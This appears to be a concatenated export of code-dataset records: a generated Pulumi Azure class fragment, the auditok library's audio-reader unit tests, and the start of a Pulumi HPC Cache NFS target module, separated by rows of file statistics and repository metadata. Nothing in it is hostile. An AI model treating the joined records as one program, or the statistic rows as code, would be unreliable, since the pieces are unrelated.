annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Zoho server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ZohoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
| 42.174649 | 417 | 0.66458 | 101,119 | 926,324 | 5.943878 | 0.012569 | 0.073536 | 0.056322 | 0.041159 | 0.956149 | 0.93658 | 0.923113 | 0.905737 | 0.895483 | 0.886081 | 0 | 0.000689 | 0.228941 | 926,324 | 21,963 | 418 | 42.17657 | 0.840797 | 0.268967 | 0 | 0.854678 | 1 | 0 | 0.152534 | 0.068574 | 0 | 0 | 0 | 0 | 0 | 1 | 0.207517 | false | 0.022357 | 0.000375 | 0 | 0.317728 | 0.00135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a02a49350479f307a1473576e8d2b45ba2315247 | 30622 | py | Python | tests/test_AudioReader.py | joinee0208/auditok | 4de704d9d60c1997cf62006173e8698906ff67d0 | ["MIT"] | 533 | 2015-09-18T22:35:34.000Z | 2022-03-26T15:20:50.000Z | tests/test_AudioReader.py | joinee0208/auditok | 4de704d9d60c1997cf62006173e8698906ff67d0 | ["MIT"] | 36 | 2016-04-11T20:11:54.000Z | 2021-12-22T05:07:48.000Z | tests/test_AudioReader.py | joinee0208/auditok | 4de704d9d60c1997cf62006173e8698906ff67d0 | ["MIT"] | 97 | 2015-12-07T15:38:00.000Z | 2022-03-24T01:17:28.000Z | """
@author: Amine Sehili <amine.sehili@gmail.com>
September 2015
"""
import unittest
from functools import partial
import sys
import wave
from genty import genty, genty_dataset
from auditok import (
dataset,
ADSFactory,
AudioDataSource,
AudioReader,
Recorder,
BufferAudioSource,
WaveAudioSource,
DuplicateArgument,
)
class TestADSFactoryFileAudioSource(unittest.TestCase):
def setUp(self):
self.audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
def test_ADS_type(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
err_msg = "wrong type for ads object, expected: 'AudioDataSource', "
err_msg += "found: {0}"
self.assertIsInstance(
ads, AudioDataSource, err_msg.format(type(ads)),
)
def test_default_block_size(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
size = ads.block_size
self.assertEqual(
size,
160,
"Wrong default block_size, expected: 160, found: {0}".format(size),
)
def test_block_size(self):
ads = ADSFactory.ads(audio_source=self.audio_source, block_size=512)
size = ads.block_size
self.assertEqual(
size,
512,
"Wrong block_size, expected: 512, found: {0}".format(size),
)
# with alias keyword
ads = ADSFactory.ads(audio_source=self.audio_source, bs=160)
size = ads.block_size
self.assertEqual(
size,
160,
"Wrong block_size, expected: 160, found: {0}".format(size),
)
def test_block_duration(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, block_dur=0.01
) # 10 ms
size = ads.block_size
self.assertEqual(
size,
160,
"Wrong block_size, expected: 160, found: {0}".format(size),
)
# with alias keyword
ads = ADSFactory.ads(audio_source=self.audio_source, bd=0.025) # 25 ms
size = ads.block_size
self.assertEqual(
size,
400,
"Wrong block_size, expected: 400, found: {0}".format(size),
)
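# Note on the numbers above: block_size is derived from block_dur as
# round(sampling_rate * block_dur), so with this 16 kHz test file a
# 0.01 s block is 160 samples and a 0.025 s block is 400 samples.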
def test_hop_duration(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, block_dur=0.02, hop_dur=0.01
) # 10 ms
size = ads.hop_size
self.assertEqual(
size, 160, "Wrong hop_size, expected: 160, found: {0}".format(size)
)
# with alias keyword
ads = ADSFactory.ads(
audio_source=self.audio_source, bd=0.025, hop_dur=0.015
) # 15 ms
size = ads.hop_size
self.assertEqual(
size,
240,
"Wrong block_size, expected: 240, found: {0}".format(size),
)
def test_sampling_rate(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
srate = ads.sampling_rate
self.assertEqual(
srate,
16000,
"Wrong sampling rate, expected: 16000, found: {0}".format(srate),
)
def test_sample_width(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
swidth = ads.sample_width
self.assertEqual(
swidth,
2,
"Wrong sample width, expected: 2, found: {0}".format(swidth),
)
def test_channels(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
channels = ads.channels
self.assertEqual(
channels,
1,
"Wrong number of channels, expected: 1, found: {0}".format(
channels
),
)
def test_read(self):
ads = ADSFactory.ads(audio_source=self.audio_source, block_size=256)
ads.open()
ads_data = ads.read()
ads.close()
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(256)
audio_source.close()
self.assertEqual(
ads_data, audio_source_data, "Unexpected data read from ads"
)
def test_Limiter_Deco_read(self):
# read a maximum of 0.75 seconds from audio source
ads = ADSFactory.ads(audio_source=self.audio_source, max_time=0.75)
ads_data = []
ads.open()
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
ads_data = b"".join(ads_data)
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(int(16000 * 0.75))
audio_source.close()
self.assertEqual(
ads_data, audio_source_data, "Unexpected data read from LimiterADS"
)
def test_Limiter_Deco_read_limit(self):
# read a maximum of 1.191 seconds from audio source
ads = ADSFactory.ads(audio_source=self.audio_source, max_time=1.191)
total_samples = round(ads.sampling_rate * 1.191)
nb_full_blocks, last_block_size = divmod(total_samples, ads.block_size)
total_samples_with_overlap = (
nb_full_blocks * ads.block_size + last_block_size
)
expected_read_bytes = (
total_samples_with_overlap * ads.sw * ads.channels
)
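        # Sanity math (assuming the default 160-sample block_size established
        # above): total_samples = round(16000 * 1.191) = 19056, which divmod
        # splits into 119 full blocks + 16 samples, so
        # expected_read_bytes = 19056 * 2 * 1 = 38112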
total_read = 0
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
total_read += len(block)
ads.close()
err_msg = "Wrong data length read from LimiterADS, expected: {0}, "
err_msg += "found: {1}"
self.assertEqual(
total_read,
expected_read_bytes,
err_msg.format(expected_read_bytes, total_read),
)
def test_Recorder_Deco_read(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, record=True, block_size=500
)
ads_data = []
ads.open()
for i in range(10):
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
ads_data = b"".join(ads_data)
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(500 * 10)
audio_source.close()
self.assertEqual(
ads_data,
audio_source_data,
"Unexpected data read from RecorderADS",
)
def test_Recorder_Deco_is_rewindable(self):
ads = ADSFactory.ads(audio_source=self.audio_source, record=True)
self.assertTrue(
ads.rewindable, "RecorderADS.is_rewindable should return True"
)
def test_Recorder_Deco_rewind_and_read(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, record=True, block_size=320
)
ads.open()
for i in range(10):
ads.read()
ads.rewind()
# read all available data after rewind
ads_data = []
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
ads_data = b"".join(ads_data)
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(320 * 10)
audio_source.close()
self.assertEqual(
ads_data,
audio_source_data,
"Unexpected data read from RecorderADS",
)
def test_Overlap_Deco_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 1714
hop_size = 313
ads = ADSFactory.ads(
audio_source=self.audio_source,
block_size=block_size,
hop_size=hop_size,
)
# Read all available data overlapping blocks
ads.open()
ads_data = []
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for i, block in enumerate(ads_data):
tmp = audio_source.read(block_size)
self.assertEqual(
block,
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (i + 1) * hop_size
audio_source.close()
def test_Limiter_Overlap_Deco_read(self):
block_size = 256
hop_size = 200
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=0.50,
block_size=block_size,
hop_size=hop_size,
)
# Read all available data overlapping blocks
ads.open()
ads_data = []
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for i, block in enumerate(ads_data):
tmp = audio_source.read(len(block) // (ads.sw * ads.ch))
self.assertEqual(
len(block),
len(tmp),
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (i + 1) * hop_size
audio_source.close()
def test_Limiter_Overlap_Deco_read_limit(self):
block_size = 313
hop_size = 207
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=1.932,
block_size=block_size,
hop_size=hop_size,
)
total_samples = round(ads.sampling_rate * 1.932)
first_read_size = block_size
next_read_size = block_size - hop_size
nb_next_blocks, last_block_size = divmod(
(total_samples - first_read_size), next_read_size
)
total_samples_with_overlap = (
first_read_size + next_read_size * nb_next_blocks + last_block_size
)
expected_read_bytes = (
total_samples_with_overlap * ads.sw * ads.channels
)
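        # Worked through: total_samples = round(16000 * 1.932) = 30912; after
        # the first 313-sample block each read adds 313 - 207 = 106 new
        # samples, so divmod(30912 - 313, 106) = (288, 71) and
        # expected_read_bytes = (313 + 288 * 106 + 71) * 2 = 30912 * 2 = 61824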
cache_size = (block_size - hop_size) * ads.sample_width * ads.channels
total_read = cache_size
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
total_read += len(block) - cache_size
ads.close()
err_msg = "Wrong data length read from LimiterADS, expected: {0}, "
err_msg += "found: {1}"
self.assertEqual(
total_read,
expected_read_bytes,
err_msg.format(expected_read_bytes, total_read),
)
def test_Recorder_Overlap_Deco_is_rewindable(self):
ads = ADSFactory.ads(
audio_source=self.audio_source,
block_size=320,
hop_size=160,
record=True,
)
self.assertTrue(
            ads.rewindable, "RecorderADS.rewindable should return True"
)
def test_Recorder_Overlap_Deco_rewind_and_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 1600
hop_size = 400
ads = ADSFactory.ads(
audio_source=self.audio_source,
block_size=block_size,
hop_size=hop_size,
record=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for j in range(i):
tmp = audio_source.read(block_size)
self.assertEqual(
ads.read(),
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 1600
hop_size = 400
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=1.50,
block_size=block_size,
hop_size=hop_size,
record=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for j in range(i):
tmp = audio_source.read(block_size)
self.assertEqual(
ads.read(),
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read_limit(self):
# Use arbitrary valid block_size and hop_size
block_size = 1000
hop_size = 200
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=1.317,
block_size=block_size,
hop_size=hop_size,
record=True,
)
total_samples = round(ads.sampling_rate * 1.317)
first_read_size = block_size
next_read_size = block_size - hop_size
nb_next_blocks, last_block_size = divmod(
(total_samples - first_read_size), next_read_size
)
total_samples_with_overlap = (
first_read_size + next_read_size * nb_next_blocks + last_block_size
)
expected_read_bytes = (
total_samples_with_overlap * ads.sw * ads.channels
)
cache_size = (block_size - hop_size) * ads.sample_width * ads.channels
total_read = cache_size
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
total_read += len(block) - cache_size
ads.close()
err_msg = "Wrong data length read from LimiterADS, expected: {0}, "
err_msg += "found: {1}"
self.assertEqual(
total_read,
expected_read_bytes,
err_msg.format(expected_read_bytes, total_read),
)
class TestADSFactoryBufferAudioSource(unittest.TestCase):
def setUp(self):
self.signal = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
self.ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
block_size=4,
)
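        # 32-byte buffer / (sample_width=2 * channels=1) = 16 samples; at
        # sampling_rate=16 that is exactly 1 second, read 4 samples per block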
def test_ADS_BAS_sampling_rate(self):
srate = self.ads.sampling_rate
self.assertEqual(
srate,
16,
"Wrong sampling rate, expected: 16000, found: {0}".format(srate),
)
def test_ADS_BAS_sample_width(self):
swidth = self.ads.sample_width
self.assertEqual(
swidth,
2,
"Wrong sample width, expected: 2, found: {0}".format(swidth),
)
def test_ADS_BAS_channels(self):
channels = self.ads.channels
self.assertEqual(
channels,
1,
"Wrong number of channels, expected: 1, found: {0}".format(
channels
),
)
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 5
hop_size = 4
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
max_time=0.80,
block_size=block_size,
hop_size=hop_size,
record=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Build a BufferAudioSource
audio_source = BufferAudioSource(
self.signal, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for j in range(i):
tmp = audio_source.read(block_size)
block = ads.read()
self.assertEqual(
block,
tmp,
"Unexpected block '{}' (N={}) read from OverlapADS".format(
                    block, j
),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
class TestADSFactoryAlias(unittest.TestCase):
def setUp(self):
self.signal = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
def test_sampling_rate_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sr=16,
sample_width=2,
channels=1,
block_dur=0.5,
)
srate = ads.sampling_rate
self.assertEqual(
srate,
16,
"Wrong sampling rate, expected: 16000, found: {0}".format(srate),
)
def test_sampling_rate_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sr=16,
sampling_rate=16,
sample_width=2,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_sample_width_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sw=2,
channels=1,
block_dur=0.5,
)
swidth = ads.sample_width
self.assertEqual(
swidth,
2,
"Wrong sample width, expected: 2, found: {0}".format(swidth),
)
def test_sample_width_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sw=2,
sample_width=2,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_channels_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
ch=1,
block_dur=4,
)
channels = ads.channels
self.assertEqual(
channels,
1,
"Wrong number of channels, expected: 1, found: {0}".format(
channels
),
)
def test_channels_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
ch=1,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_block_size_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=8,
)
size = ads.block_size
self.assertEqual(
size,
8,
"Wrong block_size using bs alias, expected: 8, found: {0}".format(
size
),
)
def test_block_size_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=4,
block_size=4,
)
self.assertRaises(DuplicateArgument, func)
def test_block_duration_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=0.75,
)
        # 0.75 s * 16 samples/s = 12 samples
size = ads.block_size
err_msg = "Wrong block_size set with a block_dur alias 'bd', "
err_msg += "expected: 8, found: {0}"
self.assertEqual(
size, 12, err_msg.format(size),
)
def test_block_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=4,
block_dur=4,
)
self.assertRaises(DuplicateArgument, func)
def test_block_size_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=4,
bs=12,
)
self.assertRaises(DuplicateArgument, func)
def test_hop_duration_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=0.75,
hd=0.5,
)
size = ads.hop_size
self.assertEqual(
size,
8,
"Wrong block_size using bs alias, expected: 8, found: {0}".format(
size
),
)
def test_hop_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=0.75,
hd=0.5,
hop_dur=0.5,
)
self.assertRaises(DuplicateArgument, func)
def test_hop_size_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=8,
hs=4,
hd=1,
)
self.assertRaises(DuplicateArgument, func)
def test_hop_size_greater_than_block_size(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=4,
hs=8,
)
self.assertRaises(ValueError, func)
def test_filename_duplicate(self):
func = partial(
ADSFactory.ads,
fn=dataset.one_to_six_arabic_16000_mono_bc_noise,
filename=dataset.one_to_six_arabic_16000_mono_bc_noise,
)
self.assertRaises(DuplicateArgument, func)
def test_data_buffer_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
db=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_max_time_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
mt=10,
block_dur=0.5,
)
self.assertEqual(
ads.max_read,
10,
"Wrong AudioDataSource.max_read, expected: 10, found: {}".format(
ads.max_read
),
)
def test_max_time_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
mt=True,
max_time=True,
)
self.assertRaises(DuplicateArgument, func)
def test_record_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
rec=True,
block_dur=0.5,
)
self.assertTrue(
ads.rewindable, "AudioDataSource.rewindable expected to be True"
)
def test_record_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
rec=True,
record=True,
)
self.assertRaises(DuplicateArgument, func)
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read_alias(self):
# Use arbitrary valid block_size and hop_size
block_size = 5
hop_size = 4
ads = ADSFactory.ads(
db=self.signal,
sr=16,
sw=2,
ch=1,
mt=0.80,
bs=block_size,
hs=hop_size,
rec=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Build a BufferAudioSource
audio_source = BufferAudioSource(
self.signal, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from AudioDataSource to those read
# from an audio source with manual position definition
for j in range(i):
tmp = audio_source.read(block_size)
block = ads.read()
self.assertEqual(
block,
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
def _read_all_data(reader):
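    """Read blocks from `reader` until it is exhausted and return them joined."""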
blocks = []
while True:
data = reader.read()
if data is None:
break
blocks.append(data)
return b"".join(blocks)
@genty
class TestAudioReader(unittest.TestCase):
# TODO move all tests here when backward compatibility
# with ADSFactory is dropped
@genty_dataset(
mono=("mono_400", 0.5, 16000),
multichannel=("3channel_400-800-1600", 0.5, 16000 * 3),
)
def test_Limiter(self, file_id, max_read, size):
input_wav = "tests/data/test_16KHZ_{}Hz.wav".format(file_id)
input_raw = "tests/data/test_16KHZ_{}Hz.raw".format(file_id)
with open(input_raw, "rb") as fp:
expected = fp.read(size)
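        # size is max_read seconds of 16 kHz, 2-byte samples:
        # 0.5 * 16000 * 2 = 16000 bytes for mono, times 3 for 3 channels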
reader = AudioReader(input_wav, block_dur=0.1, max_read=max_read)
reader.open()
data = _read_all_data(reader)
reader.close()
self.assertEqual(data, expected)
@genty_dataset(mono=("mono_400",), multichannel=("3channel_400-800-1600",))
def test_Recorder(self, file_id):
input_wav = "tests/data/test_16KHZ_{}Hz.wav".format(file_id)
input_raw = "tests/data/test_16KHZ_{}Hz.raw".format(file_id)
with open(input_raw, "rb") as fp:
expected = fp.read()
reader = AudioReader(input_wav, block_dur=0.1, record=True)
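        # record=True keeps a copy of everything read, so the reader can be
        # rewound and re-read below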
reader.open()
data = _read_all_data(reader)
self.assertEqual(data, expected)
# rewind many times
for _ in range(3):
reader.rewind()
data = _read_all_data(reader)
self.assertEqual(data, expected)
self.assertEqual(data, reader.data)
reader.close()
@genty_dataset(mono=("mono_400",), multichannel=("3channel_400-800-1600",))
def test_Recorder_alias(self, file_id):
input_wav = "tests/data/test_16KHZ_{}Hz.wav".format(file_id)
input_raw = "tests/data/test_16KHZ_{}Hz.raw".format(file_id)
with open(input_raw, "rb") as fp:
expected = fp.read()
reader = Recorder(input_wav, block_dur=0.1)
reader.open()
data = _read_all_data(reader)
self.assertEqual(data, expected)
# rewind many times
for _ in range(3):
reader.rewind()
data = _read_all_data(reader)
self.assertEqual(data, expected)
self.assertEqual(data, reader.data)
reader.close()
if __name__ == "__main__":
unittest.main()
| 28.353704 | 79 | 0.553034 | 3,443 | 30,622 | 4.684287 | 0.067964 | 0.075707 | 0.034722 | 0.03125 | 0.867684 | 0.854787 | 0.843378 | 0.81157 | 0.777344 | 0.74628 | 0 | 0.030673 | 0.361211 | 30,622 | 1,079 | 80 | 28.379981 | 0.793824 | 0.060479 | 0 | 0.701373 | 0 | 0 | 0.073963 | 0.014208 | 0 | 0 | 0 | 0.000927 | 0.065217 | 1 | 0.061785 | false | 0 | 0.006865 | 0 | 0.074371 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a0604eae2b8b9f26be5ed79b4139f2ea07760dc9 | 24,709 | py | Python | sdk/python/pulumi_azure/hpc/cache_blob_nfs_target.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/hpc/cache_blob_nfs_target.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/hpc/cache_blob_nfs_target.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CacheBlobNfsTargetArgs', 'CacheBlobNfsTarget']
@pulumi.input_type
class CacheBlobNfsTargetArgs:
def __init__(__self__, *,
cache_name: pulumi.Input[str],
namespace_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
storage_container_id: pulumi.Input[str],
usage_model: pulumi.Input[str],
access_policy_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CacheBlobNfsTarget resource.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
pulumi.set(__self__, "cache_name", cache_name)
pulumi.set(__self__, "namespace_path", namespace_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "storage_container_id", storage_container_id)
pulumi.set(__self__, "usage_model", usage_model)
if access_policy_name is not None:
pulumi.set(__self__, "access_policy_name", access_policy_name)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="cacheName")
def cache_name(self) -> pulumi.Input[str]:
"""
